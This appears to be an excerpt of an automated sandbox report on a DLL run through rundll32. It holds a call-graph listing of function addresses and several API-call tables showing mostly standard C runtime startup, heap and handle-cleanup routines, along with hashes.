8263->8267 8266 6f956a8e __freea 14 API calls 8264->8266 8289 6f95a2bb 8264->8289 8268 6f95a28f 8266->8268 8267->8264 8271 6f95a236 8267->8271 8274 6f956a8e __freea 14 API calls 8267->8274 8269 6f956a8e __freea 14 API calls 8268->8269 8270 6f95a2a2 8269->8270 8276 6f956a8e __freea 14 API calls 8270->8276 8277 6f956a8e __freea 14 API calls 8271->8277 8290 6f95a258 8271->8290 8272 6f956a8e __freea 14 API calls 8278 6f95a262 8272->8278 8273 6f95a2c9 8279 6f95a329 8273->8279 8288 6f956a8e 14 API calls __freea 8273->8288 8275 6f95a22b 8274->8275 8291 6f95a50a 8275->8291 8281 6f95a2b0 8276->8281 8282 6f95a24d 8277->8282 8283 6f956a8e __freea 14 API calls 8278->8283 8284 6f956a8e __freea 14 API calls 8279->8284 8286 6f956a8e __freea 14 API calls 8281->8286 8319 6f95a608 8282->8319 8283->8264 8285 6f95a32f 8284->8285 8285->8257 8286->8289 8288->8273 8331 6f95a35e 8289->8331 8290->8272 8292 6f95a51b 8291->8292 8318 6f95a604 8291->8318 8293 6f95a52c 8292->8293 8295 6f956a8e __freea 14 API calls 8292->8295 8294 6f95a53e 8293->8294 8296 6f956a8e __freea 14 API calls 8293->8296 8297 6f95a550 8294->8297 8298 6f956a8e __freea 14 API calls 8294->8298 8295->8293 8296->8294 8299 6f95a562 8297->8299 8300 6f956a8e __freea 14 API calls 8297->8300 8298->8297 8301 6f95a574 8299->8301 8303 6f956a8e __freea 14 API calls 8299->8303 8300->8299 8302 6f95a586 8301->8302 8304 6f956a8e __freea 14 API calls 8301->8304 8305 6f95a598 8302->8305 8306 6f956a8e __freea 14 API calls 8302->8306 8303->8301 8304->8302 8307 6f95a5aa 8305->8307 8308 6f956a8e __freea 14 API calls 8305->8308 8306->8305 8309 6f956a8e __freea 14 API calls 8307->8309 8311 6f95a5bc 8307->8311 8308->8307 8309->8311 8310 6f956a8e __freea 14 API calls 8312 6f95a5ce 8310->8312 8311->8310 8311->8312 8313 6f956a8e __freea 14 API calls 8312->8313 8315 6f95a5e0 8312->8315 8313->8315 8314 6f95a5f2 8317 6f956a8e __freea 14 API calls 8314->8317 8314->8318 8315->8314 8316 6f956a8e __freea 14 API calls 8315->8316 8316->8314 8317->8318 
8318->8271 8320 6f95a615 8319->8320 8330 6f95a66d 8319->8330 8321 6f956a8e __freea 14 API calls 8320->8321 8323 6f95a625 8320->8323 8321->8323 8322 6f95a637 8325 6f95a649 8322->8325 8326 6f956a8e __freea 14 API calls 8322->8326 8323->8322 8324 6f956a8e __freea 14 API calls 8323->8324 8324->8322 8327 6f95a65b 8325->8327 8328 6f956a8e __freea 14 API calls 8325->8328 8326->8325 8329 6f956a8e __freea 14 API calls 8327->8329 8327->8330 8328->8327 8329->8330 8330->8290 8332 6f95a38a 8331->8332 8333 6f95a36b 8331->8333 8332->8273 8333->8332 8337 6f95a696 8333->8337 8336 6f956a8e __freea 14 API calls 8336->8332 8338 6f95a384 8337->8338 8339 6f95a6a7 8337->8339 8338->8336 8340 6f95a671 _unexpected 14 API calls 8339->8340 8341 6f95a6af 8340->8341 8342 6f95a671 _unexpected 14 API calls 8341->8342 8343 6f95a6ba 8342->8343 8344 6f95a671 _unexpected 14 API calls 8343->8344 8345 6f95a6c5 8344->8345 8346 6f95a671 _unexpected 14 API calls 8345->8346 8347 6f95a6d0 8346->8347 8348 6f95a671 _unexpected 14 API calls 8347->8348 8349 6f95a6de 8348->8349 8350 6f956a8e __freea 14 API calls 8349->8350 8351 6f95a6e9 8350->8351 8352 6f956a8e __freea 14 API calls 8351->8352 8353 6f95a6f4 8352->8353 8354 6f956a8e __freea 14 API calls 8353->8354 8355 6f95a6ff 8354->8355 8356 6f95a671 _unexpected 14 API calls 8355->8356 8357 6f95a70d 8356->8357 8358 6f95a671 _unexpected 14 API calls 8357->8358 8359 6f95a71b 8358->8359 8360 6f95a671 _unexpected 14 API calls 8359->8360 8361 6f95a72c 8360->8361 8362 6f95a671 _unexpected 14 API calls 8361->8362 8363 6f95a73a 8362->8363 8364 6f95a671 _unexpected 14 API calls 8363->8364 8365 6f95a748 8364->8365 8366 6f956a8e __freea 14 API calls 8365->8366 8367 6f95a753 8366->8367 8368 6f956a8e __freea 14 API calls 8367->8368 8369 6f95a75e 8368->8369 8370 6f956a8e __freea 14 API calls 8369->8370 8371 6f95a769 8370->8371 8372 6f956a8e __freea 14 API calls 8371->8372 8372->8338 8373->8262 8374->8182 8376 6f9576d6 8375->8376 8377 6f9576dd 8375->8377 8376->8164 8383 
6f9592bd 8376->8383 8377->8376 8386 6f956567 GetLastError 8377->8386 8587 6f9590c5 8383->8587 8387 6f956583 8386->8387 8388 6f95657d 8386->8388 8390 6f9593f6 _unexpected 6 API calls 8387->8390 8392 6f956587 SetLastError 8387->8392 8389 6f9593b7 _unexpected 6 API calls 8388->8389 8389->8387 8391 6f95659f 8390->8391 8391->8392 8394 6f9578b8 _unexpected 14 API calls 8391->8394 8396 6f956617 8392->8396 8397 6f95661c 8392->8397 8395 6f9565b4 8394->8395 8399 6f9565cd 8395->8399 8400 6f9565bc 8395->8400 8413 6f959f58 8396->8413 8421 6f95609a 8397->8421 8401 6f9593f6 _unexpected 6 API calls 8399->8401 8403 6f9593f6 _unexpected 6 API calls 8400->8403 8404 6f9565d9 8401->8404 8410 6f9565ca 8403->8410 8405 6f9565f4 8404->8405 8406 6f9565dd 8404->8406 8409 6f956369 _unexpected 14 API calls 8405->8409 8407 6f9593f6 _unexpected 6 API calls 8406->8407 8407->8410 8408 6f956a8e __freea 14 API calls 8408->8392 8411 6f9565ff 8409->8411 8410->8408 8412 6f956a8e __freea 14 API calls 8411->8412 8412->8392 8414 6f957714 8413->8414 8415 6f959f6b 8413->8415 8417 6f959fb6 8414->8417 8415->8414 8544 6f95a439 8415->8544 8418 6f959fde 8417->8418 8419 6f959fc9 8417->8419 8418->8376 8419->8418 8566 6f95871f 8419->8566 8432 6f9598d3 8421->8432 8424 6f9560aa 8426 6f9560b4 IsProcessorFeaturePresent 8424->8426 8427 6f9560d3 8424->8427 8428 6f9560c0 8426->8428 8468 6f95535e 8427->8468 8462 6f954d54 8428->8462 8471 6f959801 8432->8471 8435 6f959918 8436 6f959924 CallCatchBlock 8435->8436 8437 6f9566b8 __dosmaperr 14 API calls 8436->8437 8438 6f959974 8436->8438 8441 6f959986 CallCatchBlock 8436->8441 8445 6f959955 CallCatchBlock 8436->8445 8437->8445 8439 6f956a7b __dosmaperr 14 API calls 8438->8439 8443 6f959979 8439->8443 8440 6f95995e 8440->8424 8442 6f9599bc CallCatchBlock 8441->8442 8482 6f956933 EnterCriticalSection 8441->8482 8448 6f959af6 8442->8448 8449 6f9599f9 8442->8449 8459 6f959a27 8442->8459 8446 6f954f50 ___std_exception_copy 39 API calls 8443->8446 8445->8438 8445->8440 8445->8441 
8446->8440 8450 6f959b01 8448->8450 8487 6f95697b LeaveCriticalSection 8448->8487 8455 6f956567 _unexpected 39 API calls 8449->8455 8449->8459 8453 6f95535e CallCatchBlock 21 API calls 8450->8453 8454 6f959b09 8453->8454 8457 6f959a1c 8455->8457 8456 6f956567 _unexpected 39 API calls 8460 6f959a7c 8456->8460 8458 6f956567 _unexpected 39 API calls 8457->8458 8458->8459 8483 6f959aa2 8459->8483 8460->8440 8461 6f956567 _unexpected 39 API calls 8460->8461 8461->8440 8463 6f954d70 CallCatchBlock 8462->8463 8464 6f954d9c IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 8463->8464 8465 6f954e6d CallCatchBlock 8464->8465 8466 6f951cf9 _ValidateLocalCookies 5 API calls 8465->8466 8467 6f954e8b 8466->8467 8467->8427 8489 6f95519b 8468->8489 8472 6f95980d CallCatchBlock 8471->8472 8477 6f956933 EnterCriticalSection 8472->8477 8474 6f95981b 8478 6f95985d 8474->8478 8477->8474 8481 6f95697b LeaveCriticalSection 8478->8481 8480 6f95609f 8480->8424 8480->8435 8481->8480 8482->8442 8484 6f959aa6 8483->8484 8485 6f959a6e 8483->8485 8488 6f95697b LeaveCriticalSection 8484->8488 8485->8440 8485->8456 8485->8460 8487->8450 8488->8485 8490 6f9551c8 8489->8490 8491 6f9551da 8489->8491 8516 6f955263 GetModuleHandleW 8490->8516 8501 6f95504b 8491->8501 8496 6f955217 8500 6f95522c 8502 6f955057 CallCatchBlock 8501->8502 8524 6f956933 EnterCriticalSection 8502->8524 8504 6f955061 8525 6f9550b3 8504->8525 8506 6f95506e 8529 6f95508c 8506->8529 8509 6f955232 8537 6f9552a5 8509->8537 8511 6f95523c 8512 6f955250 8511->8512 8513 6f955240 GetCurrentProcess TerminateProcess 8511->8513 8514 6f9552be CallCatchBlock 3 API calls 8512->8514 8513->8512 8515 6f955258 ExitProcess 8514->8515 8517 6f9551cd 8516->8517 8517->8491 8518 6f9552be GetModuleHandleExW 8517->8518 8519 6f9552fd GetProcAddress 8518->8519 8520 6f95531e 8518->8520 8519->8520 8523 6f955311 8519->8523 8521 6f955324 FreeLibrary 8520->8521 8522 6f9551d9 8520->8522 8521->8522 8522->8491 8523->8520 8524->8504 8527 
6f9550bf CallCatchBlock 8525->8527 8526 6f955123 CallCatchBlock 8526->8506 8527->8526 8532 6f955e19 8527->8532 8536 6f95697b LeaveCriticalSection 8529->8536 8531 6f95507a 8531->8496 8531->8509 8533 6f955e25 __EH_prolog3 8532->8533 8534 6f955ce4 __DllMainCRTStartup@12 14 API calls 8533->8534 8535 6f955e4c __DllMainCRTStartup@12 8534->8535 8535->8526 8536->8531 8540 6f9569b7 8537->8540 8539 6f9552aa CallCatchBlock 8539->8511 8542 6f9569c6 CallCatchBlock 8540->8542 8541 6f9569d3 8541->8539 8542->8541 8543 6f95927d CallCatchBlock 5 API calls 8542->8543 8543->8541 8545 6f95a445 CallCatchBlock 8544->8545 8546 6f956567 _unexpected 39 API calls 8545->8546 8547 6f95a44e 8546->8547 8548 6f95a494 8547->8548 8557 6f956933 EnterCriticalSection 8547->8557 8548->8414 8550 6f95a46c 8558 6f95a4ba 8550->8558 8555 6f95609a IsInExceptionSpec 39 API calls 8556 6f95a4b9 8555->8556 8557->8550 8559 6f95a47d 8558->8559 8560 6f95a4c8 _unexpected 8558->8560 8562 6f95a499 8559->8562 8560->8559 8561 6f95a1ed _unexpected 14 API calls 8560->8561 8561->8559 8565 6f95697b LeaveCriticalSection 8562->8565 8564 6f95a490 8564->8548 8564->8555 8565->8564 8567 6f956567 _unexpected 39 API calls 8566->8567 8568 6f958724 8567->8568 8571 6f958637 8568->8571 8572 6f958643 CallCatchBlock 8571->8572 8579 6f95865d 8572->8579 8582 6f956933 EnterCriticalSection 8572->8582 8574 6f958699 8583 6f9586b6 8574->8583 8576 6f95609a IsInExceptionSpec 39 API calls 8580 6f9586d6 8576->8580 8577 6f958664 8577->8418 8578 6f95866d 8578->8574 8581 6f956a8e __freea 14 API calls 8578->8581 8579->8576 8579->8577 8581->8574 8582->8578 8586 6f95697b LeaveCriticalSection 8583->8586 8585 6f9586bd 8585->8579 8586->8585 8588 6f9591f8 _unexpected 5 API calls 8587->8588 8589 6f9590db 8588->8589 8589->8164 8591 6f9575fe 8590->8591 8592 6f957618 8590->8592 8608 6f957780 8591->8608 8594 6f95761f 8592->8594 8595 6f95763e 8592->8595 8597 6f957608 8594->8597 8612 6f95779a 8594->8612 8617 6f958ad1 8595->8617 8597->8026 8597->8027 8598 6f95764d 
8600 6f957654 GetLastError 8598->8600 8602 6f95767a 8598->8602 8604 6f95779a 15 API calls 8598->8604 8601 6f956a21 __dosmaperr 14 API calls 8600->8601 8603 6f957660 8601->8603 8602->8597 8605 6f958ad1 ___scrt_uninitialize_crt MultiByteToWideChar 8602->8605 8606 6f956a7b __dosmaperr 14 API calls 8603->8606 8604->8602 8607 6f957691 8605->8607 8606->8597 8607->8597 8607->8600 8609 6f957793 8608->8609 8610 6f95778b 8608->8610 8609->8597 8611 6f956a8e __freea 14 API calls 8610->8611 8611->8609 8613 6f957780 14 API calls 8612->8613 8614 6f9577a8 8613->8614 8620 6f9577d9 8614->8620 8644 6f958a39 8617->8644 8623 6f95786a 8620->8623 8624 6f9578a8 8623->8624 8628 6f957878 _unexpected 8623->8628 8626 6f956a7b __dosmaperr 14 API calls 8624->8626 8625 6f957893 HeapAlloc 8627 6f9577b9 8625->8627 8625->8628 8626->8627 8627->8597 8628->8624 8628->8625 8630 6f9554c6 8628->8630 8633 6f9554f2 8630->8633 8634 6f9554fe CallCatchBlock 8633->8634 8639 6f956933 EnterCriticalSection 8634->8639 8636 6f955509 CallCatchBlock 8640 6f955540 8636->8640 8639->8636 8643 6f95697b LeaveCriticalSection 8640->8643 8642 6f9554d1 8642->8628 8643->8642 8645 6f958a4a MultiByteToWideChar 8644->8645 8645->8598 8670 6f956c5b 8646->8670 8650 6f957741 39 API calls 8649->8650 8651 6f95ae5d 8650->8651 8652 6f9576a2 17 API calls 8651->8652 8654 6f95ae6a 8652->8654 8653 6f95aed1 8655 6f95aedd 8653->8655 8657 6f956a8e __freea 14 API calls 8653->8657 8654->8653 8656 6f957741 39 API calls 8654->8656 8658 6f95aeec 8655->8658 8661 6f956a8e __freea 14 API calls 8655->8661 8659 6f95ae76 8656->8659 8657->8655 8660 6f956fbd 8658->8660 8664 6f956a8e __freea 14 API calls 8658->8664 8662 6f9576a2 17 API calls 8659->8662 8660->8059 8660->8060 8660->8061 8661->8658 8663 6f95ae83 8662->8663 8663->8653 8665 6f95aead CreateProcessW 8663->8665 8666 6f957741 39 API calls 8663->8666 8664->8660 8665->8653 8667 6f95ae94 8666->8667 8668 6f9576a2 17 API calls 8667->8668 8669 6f95aea1 8668->8669 8669->8653 8669->8665 8671 6f956c67 
CallCatchBlock 8670->8671 8678 6f956933 EnterCriticalSection 8671->8678 8673 6f956c75 8679 6f9570b7 8673->8679 8678->8673 8680 6f9570e0 8679->8680 8681 6f95710c 8680->8681 8682 6f95711e 8680->8682 8683 6f956a7b __dosmaperr 14 API calls 8681->8683 8684 6f9578b8 _unexpected 14 API calls 8682->8684 8689 6f956c82 8683->8689 8685 6f957132 8684->8685 8686 6f956a7b __dosmaperr 14 API calls 8685->8686 8687 6f957140 8685->8687 8686->8687 8688 6f956a8e __freea 14 API calls 8687->8688 8688->8689 8690 6f956caa 8689->8690 8693 6f95697b LeaveCriticalSection 8690->8693 8692 6f956c93 8692->8047 8692->8048 8693->8692 8695 6f954eae _Allocate 8694->8695 8700 6f954ed3 8695->8700 8701 6f954ee3 8700->8701 8702 6f954eea 8700->8702 8715 6f954cf1 GetLastError 8701->8715 8706 6f954ec6 8702->8706 8719 6f954cc8 8702->8719 8705 6f954f1f 8705->8706 8707 6f954f7d _Allocate 11 API calls 8705->8707 8709 6f954c8c 8706->8709 8708 6f954f4f 8707->8708 8710 6f954c98 8709->8710 8711 6f954caf 8710->8711 8744 6f954d37 8710->8744 8713 6f954cc2 8711->8713 8714 6f954d37 _Allocate 39 API calls 8711->8714 8713->7975 8714->8713 8716 6f954d0a 8715->8716 8722 6f956769 8716->8722 8720 6f954cd3 GetLastError SetLastError 8719->8720 8721 6f954cec 8719->8721 8720->8705 8721->8705 8723 6f956782 8722->8723 8724 6f95677c 8722->8724 8725 6f9593f6 _unexpected 6 API calls 8723->8725 8730 6f954d22 SetLastError 8723->8730 8726 6f9593b7 _unexpected 6 API calls 8724->8726 8727 6f95679c 8725->8727 8726->8723 8728 6f9578b8 _unexpected 14 API calls 8727->8728 8727->8730 8729 6f9567ac 8728->8729 8731 6f9567b4 8729->8731 8732 6f9567c9 8729->8732 8730->8702 8733 6f9593f6 _unexpected 6 API calls 8731->8733 8734 6f9593f6 _unexpected 6 API calls 8732->8734 8735 6f9567c0 8733->8735 8736 6f9567d5 8734->8736 8740 6f956a8e __freea 14 API calls 8735->8740 8737 6f9567d9 8736->8737 8738 6f9567e8 8736->8738 8741 6f9593f6 _unexpected 6 API calls 8737->8741 8739 6f956369 _unexpected 14 API calls 8738->8739 8742 6f9567f3 8739->8742 8740->8730 
8741->8735 8743 6f956a8e __freea 14 API calls 8742->8743 8743->8730 8745 6f954d41 8744->8745 8746 6f954d4a 8744->8746 8747 6f954cf1 _Allocate 16 API calls 8745->8747 8746->8711 8748 6f954d46 8747->8748 8748->8746 8749 6f95609a IsInExceptionSpec 39 API calls 8748->8749 8750 6f954d53 8749->8750 8984 6f951d2a 8985 6f951d35 8984->8985 8986 6f951d68 8984->8986 8988 6f951d5a 8985->8988 8989 6f951d3a 8985->8989 9023 6f951e84 8986->9023 8996 6f951d7d 8988->8996 8991 6f951d50 8989->8991 8992 6f951d3f 8989->8992 9015 6f95237c 8991->9015 8995 6f951d44 8992->8995 9010 6f95239b 8992->9010 8997 6f951d89 CallCatchBlock 8996->8997 9046 6f95240c 8997->9046 8999 6f951d90 __DllMainCRTStartup@12 9000 6f951db7 8999->9000 9001 6f951e7c 8999->9001 9008 6f951df3 ___scrt_is_nonwritable_in_current_image CallCatchBlock 8999->9008 9057 6f95236e 9000->9057 9065 6f9525ab IsProcessorFeaturePresent 9001->9065 9004 6f951e83 9005 6f951dc6 __RTC_Initialize 9005->9008 9060 6f95228c InitializeSListHead 9005->9060 9007 6f951dd4 9007->9008 9061 6f952343 9007->9061 9008->8995 9212 6f955fba 9010->9212 9301 6f9531ec 9015->9301 9018 6f952385 9018->8995 9021 6f952398 9021->8995 9022 6f9531f7 21 API calls 9022->9018 9025 6f951e90 CallCatchBlock __DllMainCRTStartup@12 9023->9025 9024 6f951e99 9024->8995 9025->9024 9026 6f951ec1 9025->9026 9027 6f951f2c 9025->9027 9321 6f9523dc 9026->9321 9028 6f9525ab __DllMainCRTStartup@12 4 API calls 9027->9028 9032 6f951f33 CallCatchBlock 9028->9032 9030 6f951ec6 9330 6f952298 9030->9330 9033 6f951f69 dllmain_raw 9032->9033 9042 6f951f64 __DllMainCRTStartup@12 9032->9042 9043 6f951f4f 9032->9043 9035 6f951f83 dllmain_crt_dispatch 9033->9035 9033->9043 9034 6f951ecb __RTC_Initialize __DllMainCRTStartup@12 9333 6f95257d 9034->9333 9035->9042 9035->9043 9039 6f951fd5 9040 6f951fde dllmain_crt_dispatch 9039->9040 9039->9043 9041 6f951ff1 dllmain_raw 9040->9041 9040->9043 9041->9043 9042->9039 9044 6f951e84 __DllMainCRTStartup@12 81 API calls 9042->9044 9043->8995 9045 6f951fca 
dllmain_raw 9044->9045 9045->9039 9047 6f952415 9046->9047 9069 6f952778 IsProcessorFeaturePresent 9047->9069 9051 6f952426 9056 6f95242a 9051->9056 9079 6f955f9d 9051->9079 9054 6f952441 9054->8999 9056->8999 9206 6f952445 9057->9206 9059 6f952375 9059->9005 9060->9007 9062 6f952348 ___scrt_release_startup_lock 9061->9062 9063 6f952778 IsProcessorFeaturePresent 9062->9063 9064 6f952351 9062->9064 9063->9064 9064->9008 9066 6f9525c1 CallCatchBlock 9065->9066 9067 6f95266c IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 9066->9067 9068 6f9526b7 CallCatchBlock 9067->9068 9068->9004 9070 6f952421 9069->9070 9071 6f9531cd 9070->9071 9088 6f953807 9071->9088 9074 6f9531d6 9074->9051 9076 6f9531de 9077 6f9531e9 9076->9077 9102 6f953843 9076->9102 9077->9051 9144 6f959768 9079->9144 9082 6f953202 9083 6f953215 9082->9083 9084 6f95320b 9082->9084 9083->9056 9085 6f9537ec ___vcrt_uninitialize_ptd 6 API calls 9084->9085 9086 6f953210 9085->9086 9087 6f953843 ___vcrt_uninitialize_locks DeleteCriticalSection 9086->9087 9087->9083 9089 6f953810 9088->9089 9091 6f953839 9089->9091 9092 6f9531d2 9089->9092 9106 6f953e3b 9089->9106 9093 6f953843 ___vcrt_uninitialize_locks DeleteCriticalSection 9091->9093 9092->9074 9094 6f9537b9 9092->9094 9093->9092 9125 6f953d4c 9094->9125 9097 6f9537ce 9097->9076 9100 6f9537e9 9100->9076 9103 6f95384e 9102->9103 9105 6f95386d 9102->9105 9104 6f953858 DeleteCriticalSection 9103->9104 9104->9104 9104->9105 9105->9074 9111 6f953d03 9106->9111 9109 6f953e73 InitializeCriticalSectionAndSpinCount 9110 6f953e5e 9109->9110 9110->9089 9112 6f953d1b 9111->9112 9115 6f953d3e 9111->9115 9112->9115 9117 6f953c69 9112->9117 9115->9109 9115->9110 9116 6f953d30 GetProcAddress 9116->9115 9122 6f953c75 ___vcrt_InitializeCriticalSectionEx 9117->9122 9118 6f953c8b LoadLibraryExW 9120 6f953cf0 9118->9120 9121 6f953ca9 GetLastError 9118->9121 9119 6f953ce9 9119->9115 9119->9116 9120->9119 9123 6f953cf8 FreeLibrary 9120->9123 9121->9122 
9122->9118 9122->9119 9124 6f953ccb LoadLibraryExW 9122->9124 9123->9119 9124->9120 9124->9122 9126 6f953d03 ___vcrt_InitializeCriticalSectionEx 5 API calls 9125->9126 9127 6f953d66 9126->9127 9128 6f953d7f TlsAlloc 9127->9128 9129 6f9537c3 9127->9129 9129->9097 9130 6f953dfd 9129->9130 9131 6f953d03 ___vcrt_InitializeCriticalSectionEx 5 API calls 9130->9131 9132 6f953e17 9131->9132 9133 6f953e32 TlsSetValue 9132->9133 9134 6f9537dc 9132->9134 9133->9134 9134->9100 9135 6f9537ec 9134->9135 9136 6f9537fc 9135->9136 9137 6f9537f6 9135->9137 9136->9097 9139 6f953d87 9137->9139 9140 6f953d03 ___vcrt_InitializeCriticalSectionEx 5 API calls 9139->9140 9141 6f953da1 9140->9141 9142 6f953dad 9141->9142 9143 6f953db9 TlsFree 9141->9143 9142->9136 9143->9142 9145 6f959778 9144->9145 9146 6f952433 9144->9146 9145->9146 9148 6f9596dc 9145->9148 9146->9054 9146->9082 9149 6f9596e8 CallCatchBlock 9148->9149 9160 6f956933 EnterCriticalSection 9149->9160 9151 6f9596ef 9161 6f95baf8 9151->9161 9159 6f95970d 9185 6f959733 9159->9185 9160->9151 9162 6f95bb04 CallCatchBlock 9161->9162 9163 6f95bb0d 9162->9163 9164 6f95bb2e 9162->9164 9166 6f956a7b __dosmaperr 14 API calls 9163->9166 9188 6f956933 EnterCriticalSection 9164->9188 9167 6f95bb12 9166->9167 9168 6f954f50 ___std_exception_copy 39 API calls 9167->9168 9169 6f9596fe 9168->9169 9169->9159 9174 6f959576 GetStartupInfoW 9169->9174 9170 6f95bb66 9196 6f95bb8d 9170->9196 9171 6f95bb3a 9171->9170 9189 6f95ba48 9171->9189 9175 6f959593 9174->9175 9177 6f959627 9174->9177 9176 6f95baf8 40 API calls 9175->9176 9175->9177 9178 6f9595bb 9176->9178 9180 6f95962c 9177->9180 9178->9177 9179 6f9595eb GetFileType 9178->9179 9179->9178 9181 6f959633 9180->9181 9182 6f959676 GetStdHandle 9181->9182 9183 6f9596d8 9181->9183 9184 6f959689 GetFileType 9181->9184 9182->9181 9183->9159 9184->9181 9205 6f95697b LeaveCriticalSection 9185->9205 9187 6f95971e 9187->9145 9188->9171 9190 6f9578b8 _unexpected 14 API calls 9189->9190 9193 6f95ba5a 
9190->9193 9191 6f95ba67 9192 6f956a8e __freea 14 API calls 9191->9192 9194 6f95babc 9192->9194 9193->9191 9199 6f959438 9193->9199 9194->9171 9204 6f95697b LeaveCriticalSection 9196->9204 9198 6f95bb94 9198->9169 9200 6f9591f8 _unexpected 5 API calls 9199->9200 9201 6f959454 9200->9201 9202 6f959472 InitializeCriticalSectionAndSpinCount 9201->9202 9203 6f95945d 9201->9203 9202->9203 9203->9193 9204->9198 9205->9187 9207 6f952455 9206->9207 9208 6f952451 9206->9208 9209 6f9525ab __DllMainCRTStartup@12 4 API calls 9207->9209 9211 6f952462 ___scrt_release_startup_lock 9207->9211 9208->9059 9210 6f9524cb 9209->9210 9211->9059 9218 6f95653b 9212->9218 9215 6f9531f7 9284 6f9536e3 9215->9284 9219 6f956545 9218->9219 9220 6f9523a0 9218->9220 9221 6f9593b7 _unexpected 6 API calls 9219->9221 9220->9215 9222 6f95654c 9221->9222 9222->9220 9223 6f9593f6 _unexpected 6 API calls 9222->9223 9224 6f95655f 9223->9224 9226 6f956402 9224->9226 9227 6f95640d 9226->9227 9228 6f95641d 9226->9228 9232 6f956423 9227->9232 9228->9220 9231 6f956a8e __freea 14 API calls 9231->9228 9233 6f95643e 9232->9233 9234 6f956438 9232->9234 9236 6f956a8e __freea 14 API calls 9233->9236 9235 6f956a8e __freea 14 API calls 9234->9235 9235->9233 9237 6f95644a 9236->9237 9238 6f956a8e __freea 14 API calls 9237->9238 9239 6f956455 9238->9239 9240 6f956a8e __freea 14 API calls 9239->9240 9241 6f956460 9240->9241 9242 6f956a8e __freea 14 API calls 9241->9242 9243 6f95646b 9242->9243 9244 6f956a8e __freea 14 API calls 9243->9244 9245 6f956476 9244->9245 9246 6f956a8e __freea 14 API calls 9245->9246 9247 6f956481 9246->9247 9248 6f956a8e __freea 14 API calls 9247->9248 9249 6f95648c 9248->9249 9250 6f956a8e __freea 14 API calls 9249->9250 9251 6f956497 9250->9251 9252 6f956a8e __freea 14 API calls 9251->9252 9253 6f9564a5 9252->9253 9258 6f95624f 9253->9258 9259 6f95625b CallCatchBlock 9258->9259 9274 6f956933 EnterCriticalSection 9259->9274 9261 6f95628f 9275 6f9562ae 9261->9275 9263 6f956265 9263->9261 9265 

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                  • Part of subcall function 6F956A8E: HeapFree.KERNEL32(00000000,00000000,?,6F95A68A,?,00000000,?,?,6F95A6AF,?,00000007,?,?,6F95A384,?,?), ref: 6F956AA4
                                                                                                  • Part of subcall function 6F956A8E: GetLastError.KERNEL32(?,?,6F95A68A,?,00000000,?,?,6F95A6AF,?,00000007,?,?,6F95A384,?,?), ref: 6F956AAF
                                                                                                • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6F956FDC
                                                                                                • GetExitCodeProcess.KERNELBASE(?,?), ref: 6F956FE9
                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6F956FFE
                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6F957009
                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6F957014
                                                                                                • __dosmaperr.LIBCMT ref: 6F95701B
                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6F957026
                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6F957031
                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6F957043
                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6F95704E
                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6F95707F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.1946745973.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000004.00000002.1946719517.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946770145.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946792387.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946814784.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6f950000_rundll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseHandle$ErrorLast$CodeExitFreeHeapObjectProcessSingleWait__dosmaperr
                                                                                                • String ID:
                                                                                                • API String ID: 2764183375-0
                                                                                                • Opcode ID: d5ae05d5f146bc4ca3e0d0321ca3818495068bc107bf2a68a8105dab6195e736
                                                                                                • Instruction ID: a321e98985f0f9d9a18d7ef8a04501a5f8a3b317096c4e47111c4bc96319f699
                                                                                                • Opcode Fuzzy Hash: d5ae05d5f146bc4ca3e0d0321ca3818495068bc107bf2a68a8105dab6195e736
                                                                                                • Instruction Fuzzy Hash: 49515B7190020CEBEF12DFA4C984AEE7BB9EF46315F108166E910A61D1D731DA78DF62

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • __RTC_Initialize.LIBCMT ref: 6F951ECB
                                                                                                • ___scrt_uninitialize_crt.LIBCMT ref: 6F951EE5
                                                                                                Similarity
                                                                                                • API ID: Initialize___scrt_uninitialize_crt
                                                                                                • String ID:
                                                                                                • API String ID: 2442719207-0
                                                                                                • Opcode ID: 2bbbc4437b33f0beafa3613e169e1d1912b658109abf41a96f938a2b6b962db6
                                                                                                • Instruction ID: e2276723bfa995d3542d43ed16c1eda4113e27017016161c2d1841421cb4f0a4
                                                                                                • Opcode Fuzzy Hash: 2bbbc4437b33f0beafa3613e169e1d1912b658109abf41a96f938a2b6b962db6
                                                                                                • Instruction Fuzzy Hash: 4D41D672D05715AFDB21CF69CC40BAE3AB9EF967A4F10411AE8146B2D1D730DDA1CBA0

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,00000000,?,44818074,?,6F95923C,00000000,6F9510C9,00000000,00000000), ref: 6F9591EE
                                                                                                Strings
                                                                                                Similarity
                                                                                                • API ID: FreeLibrary
                                                                                                • String ID: api-ms-$ext-ms-
                                                                                                • API String ID: 3664257935-537541572
                                                                                                • Opcode ID: f554dc15ddbba9cf125c6ce60cf5df5e1b206662ab8630a6768cee15615cc257
